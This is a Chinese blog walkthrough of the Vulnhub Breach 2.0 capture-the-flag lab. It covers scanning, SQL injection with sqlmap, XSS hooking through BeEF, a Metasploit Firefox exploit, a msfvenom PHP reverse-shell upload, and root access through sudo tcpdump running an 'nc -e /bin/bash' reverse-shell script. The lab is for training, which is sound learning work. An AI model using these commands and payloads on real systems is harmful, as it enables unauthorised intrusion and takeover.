Breach 2.0

已于 2024-10-24 16:12:29 修改
阅读量1.5k 收藏 8
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Vulnhub 文章标签: 安全 1024程序员节
于 2021-08-03 00:31:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45736958/article/details/119337463
本文详细介绍了Breach 2.0靶场的渗透过程,包括环境配置、信息收集、利用beef和msfconsole获取shell、后渗透及提权等步骤。在信息收集阶段,通过nmap端口探测、ssh服务连接、目录扫描和sql注入等手段,最终通过xss攻击拿到shell。在后渗透阶段,通过查看ssh配置、端口和服务,利用msf进一步渗透。最后,通过nc反弹shell并读取flag完成提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

一、靶场环境配置

靶机:

Breach-2.0 192.168.110.151 仅主机模式

攻击机:

Kali 192.168.110.5 仅主机模式

192.168.101.11 NAT模式

二、对目标进行信息收集

1.nmap端口探测
┌──(root💀xuegod)-[~/桌面]
└─# nmap -A 192.168.110.151 -p1-65535

发现靶场的ssh服务是在65535端口

image-20210802120555370

2.连接ssh服务
┌──(root💀xuegod)-[~/桌面]
└─# ssh 192.168.110.151 -p 65535

因为翻译试了好几次弱密码都不行,后面突然发现这里:密码是inthesource

image-20210802122050300

使用peter账号连接

image-20210802125949719

再次使用nmap扫描,发现多了一个80端口

image-20210802130055191

访问80端口也并没发现什么

image-20210802163329988

3.扫描目录
┌──(root💀xuegod)-[~/桌面]
└─# dirb http://192.168.110.151    发现有个blog目录

image-20210802163737519

秉着见框就插的原则,在搜索框插入xss语句,发现插入的语句会传入get传参里,没有过滤

image-20210802163914600

4.sql注入找到管理员的账号密码
┌──(root💀xuegod)-[~/桌面]
└─# sqlmap -u http://192.168.110.151/blog/index.php?search=111 -D oscommerce -Tosc_administrators --dump

image-20210802164701182

账号:admin密码:admin 但没有找到登录窗口

image-20210802164857024

5.通过关键字,漏洞库搜索payload

blogphp

该博客系统版本存在存储型XSS,在注册页面用户名的地方输入XSS攻击语句就可以成功攻击

image-20210802191634634

image-20210802191928251

三、使用beef+msfconsole拿shell

1.使用beef进行xss攻击

image-20210802192627352

登录

image-20210802192755468

image-20210802192943565

成功上线,发现浏览器是Firefox15.0版本

Mozilla Firefox ESR 15内存破坏漏洞(CVE-2012-3982)可导致任意代码执行

image-20210802193538814

2.使用msf生成对应的exp
msf6 > use exploit/multi/browser/firefox_proto_crmfrequest 		//进入要利用的exp框架
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set payload generic/shell_reverse_tcp 		//设置要利用exp所需要的payload
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvhost 192.168.110.5			//设置攻击机IP
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath shell				//设置exp攻击成功之后的url目录
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lhost 192.168.110.5			//设置payload的ip地址

image-20210802194951235

image-20210802201113592

3.使用beef+msf将浏览器链接进行重定向

使用beef的Redirect Browser模块,输入msf生成的url进行攻击

image-20210802201459331

image-20210802202300366

4.将shell转义到msfconsole

因为浏览器的shell会在建立后过5秒多就失效了,因此我们需要将shell转移的msf,获得一个稳定的shell

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 2
msf6 post(multi/manage/shell_to_meterpreter) > exploit 
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 3

image-20210802203352246

5.利用python调用本地shell实现交互式命令行
python -c 'import pty;pty.spawn("/bin/bash")'

image-20210802204048692

四、后渗透

1.查看ssh配置文件

最开始连接ssh服务会直接断开连接,然后开启80断开

cat /etc/ssh/sshd_config
检测到peter登录会执行startme脚本

image-20210802225122639

sudo的方式执行启动apache服务,之后就将数据丢弃

/dev/null : 在类Unix系统中,/dev/null,或称空设备,是一个特殊的设备文件,它丢弃一切写入其中的数据(但报告写入操作成功),读取它则会立即得到一个EOF。

image-20210802225453926

2.查看所开启的端口
peter@breach2:~$ netstat -ntulp

n ---  显示ip代替网络接口信息,显示出网络连接情况

t  ---  显示TCP协议的链接状况

u ---  显示UDP协议的链接状况  

p ---  显示链接程序的名称和PID

l  ---  显示监听服务器的套接字

image-20210802230028063

访问2323端口
peter@breach2:~$ telnet 127.0.0.1 2323
获得一个坐标进行查询
29 45'46" N 95 22'59" W

image-20210802230317564

坐标是在一个公园 Houston Police Department Memorial

image-20210802231837852

3.查看passwd文件里的用户名和密码
cat /etc/passwd
发现有`milton`和`blumbergh`两个用户

image-20210802232154433

Houston作为miltonblumbergh的密码进行尝试登录

image-20210802232951729

是milton的密码,但是又在问这是谁的打印机

image-20210802233042334

寻找关于账号milton的文件
find /usr -user milton
找到了问题答案是mine

image-20210802233342415

4.登录milton账号进行渗透

image-20210802233540412

5.查看端口,发现又启动了一个8888端口

image-20210802233752744

访问发现多了两个网页

image-20210802233845570

image-20210802233912648

nginx默认首页没有利用价值

image-20210802233954609

6.目录爆破找到了后台登录地址

image-20210802234307331

image-20210802234322813

利用之前从数据库里获得的账号密码登录

admin/admin

image-20210802234416645

7.利用msf获取shell

在tools–>file manager–>includes–>work目录,有可写入权限

image-20210802235010839

制作反弹shell
┌──(root💀xuegod)-[~/桌面]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.5 LPORT=8888 -f raw > shell.php

image-20210802235238514

开启msf监听
msf6 > use exploit/multi/handler			//使用exp监听模块
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp		//使用payload为之前生成后门所用的payload
msf6 exploit(multi/handler) > set lhost 192.168.110.5		//接收shell的ip
msf6 exploit(multi/handler) > set lport 8888		//监听端口

image-20210802235819857

上传shell.php

image-20210802235926852

在浏览器中访问shell.php,访问的url为:http://192.168.110.151:8888/oscommerce/includes/work/shell.php,访问之后,msf顺利接收到shell

image-20210803000156361

image-20210803000210025

五.提权

image-20210803000359227

发现root不需要密码的命令为tcpdump

image-20210803000511344

1.利用nc反弹shell
nc -lvnp 2021

image-20210803000827538

在msf刚得到的shell中写入脚本
echo "nc 192.168.110.5 2021 -e /bin/bash"> /tmp/shell.sh		//在/tmp目录下写入shell.sh脚本
chmod +x /tmp/shell.sh		//添加执行权限
sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root		//使用tcpdump命令

image-20210803001359014

2.利用反弹shell读取flag

shell已经反弹到了nc监听界面,权限是root

image-20210803001537328

利用ls-la找到了隐藏文件flag.py

image-20210803001723790

运行flag.py文件结束这个靶机

image-20210803001937280

image-20210803001956874

(VulnHub靶机通关)breach系列:breach-2.1细节通关方法
yang1234567898的博客
01-26 3787
靶机下载地址:https://download.vulnhub.com/breach/Breach-2_final2.1.zip 需要配置仅主机模式
Breach-2_final2.1靶机复现
weixin_52956666的博客
08-02 1107
到/usr/share/beef-xss/下查看config.yaml文件,;靶机设置为仅主机模式,该靶机特殊,IP固定为192.168.110.151。netstat -tunlpa发现靶机有一个一直在监听的2323端口。telnet连接,发现失败,看起来像是http服务,再次扫描端口。nmap再次扫描,果然发现存在8888端口的http服务。发现提示用户Peter,密码是inthesource。netstat -tunlpa发现有8888端口监听。输入之发现的admin,admin,登陆成功。
VulnHub | Breach - 1
Blue17 の 小窝
05-16 1233
0x01:Breach - 1 靶场描述0x01:Breach - 1 靶场描述0x0101:靶场简介"Breach 1.0" 是一个适合新手到中级玩家的 boot2root/CTF 挑战。它要求参与者进行扎实的信息收集和坚持不懈的探索。该靶场的关键信息如下(好像没有目标嘿):目标 VM 的静态 IP 地址是 192.168.110.140,需要将主机的仅主机适配器配置到该子网。该靶场是该系列的第一个挑战,旨在提高参与者的渗透测试技能。如果遇到问题,可以联系发布者,其 Twitter 账号为。
Breach-2_final2.1靶机
weixin_74232792的博客
08-01 1670
又臭又长
Breach-2.1
weixin_44770698的博客
03-10 864
靶场练习-60
Breach 渗透环境安装
jeff_true的博客
12-31 343
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体...
一起打靶-Breach-2-final2.1.xss上线
09-28
靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的生产环境场景,带有许多twists 和 trolls。 知识点3:测试...
NSS Labs BDS 评测报告 FAQ v2.0.pdf
最新发布
07-14
Breach Detection System(BDS)是 NSS Labs关注的安全领域之一。根据NSS Labs的描述,BDS解决方案通过持续分析可疑代码以及识别与恶意主机的通信,能够检测和防止数据泄露。BDS系统的目的是提供快速的威胁检测和...
BREACH攻击下的CSRF防御策略与实现
"针对Breach攻击的CSRF防御模块的设计与实现" ...通过结合加密技术改进传统Token校验方法,该防御模块不仅增强了对CSRF的防护,还对新兴的BREACH攻击进行了有效防御,对于Web2.0安全领域具有重要的理论和实践价值。
溃坝洪水演进计算IWHR-DB.xlsm
08-05
Dam Breach Analysis DB-IWHR V2.0 陈祖煜院士开源软件 excelVBA编制,简单直接
Breach-2_final2.1_xss挑战上线:实战演示与攻防策略
在"一起打靶-Breach-2_final2.1.xss上线"这个挑战中,Breach-2.0 是一个实战型的Boot2Root/CTF(Capture The Flag)游戏,它的目标是通过一系列的真实世界场景和意想不到的转折来展示安全攻击和防御的过程。...
VulnHub靶场笔记 - Breach: 2.1(OSCP推荐靶场)
m0_62652276的博客
12-31 1493
根据此前的提示,我们尝试使用beef-xss工具(密码igfix),我们将红框中的数据作为用户名在blog中注册一个用户,把127.0.0.1替换为Kali的地址。sshd_config是客户端的ssh配置文件,查看内容,在配置文件末尾发现,ssh连接过程会强制执行名为startme的程序,推测其与ssh无法成功连接有关。综合之前的思路,既然peter用户的密码是知道的但无法正常进行ssh登录,我们尝试查找与ssh相关的配置。
Breach 2.1靶机
m0_61995767的博客
08-02 2236
Breach 2.1打靶记录
breach靶场练习详细全过程
weixin_73562787的博客
07-18 600
1.这次的靶场打的我比较震惊的,长见识了,真的很明显的感受到信息搜索和分析的力量,有种睿智的推理家的感觉了,特别是到后面推测用户blumbergh与bill微妙的关系,以及最后blumbergh的密码是隐藏在bill的图片里,是需要一大段信息的搜索和条理清晰的分析才能得到的推断的,要有耐心,不放过任何一条线索。
通过frp搭建属于自己的免费稳定的内网穿透服务
发现问题,面对问题,分析问题,解决问题,总结问题
05-23 5839
之前的开发中,使用的内网穿透工具都是natapp,虽然该工具用起来很简单,但是每次重启都会变动域名,而且因为是免费的隧道传输上也被限制了,使用起来也很卡,所以也一直希望能够找到一款稳定的免费的内网穿透工具。frp是开源内网穿透软件,需要自己搭建服务器端和客户端,域名和带宽都是由自己提供的,所以也不存在随机域名和网速限制的情况
一次零基础 自“信息收集“到“权限维持“的渗透测试全程详细记录
ranzi.
07-09 1084
权限提升,就是所谓的提权,因为一般进入拿到webshell后进入到服务器了都是低权限,在接下来的靶中我们的目标都是拿到root权限,所以拿到webshell后是低权限用户,这个时候我们需要一系列的方式进行提权,最后拿到root权限,即为结束。命令:cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip。在渗透测试中,权限维持是非常重要的一步。
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 20万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
Web安全:靶场、渗透工具、信息收集、输入输出漏洞、业务逻辑漏洞
jennycisp的博客
06-03 410
包含了靶场、渗透工具、信息收集、输入输出漏洞、业务逻辑漏洞。
identity breach什么意思
03-28
identity breach指的是指个人身份信息被未经授权的第三方获取或使用的情况。这可能涉及到诸如姓名、地址、电话号码、电子邮件地址、社会保险号码、银行账户信息和其他个人信息的泄露。这种情况通常会对个人造成严重...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值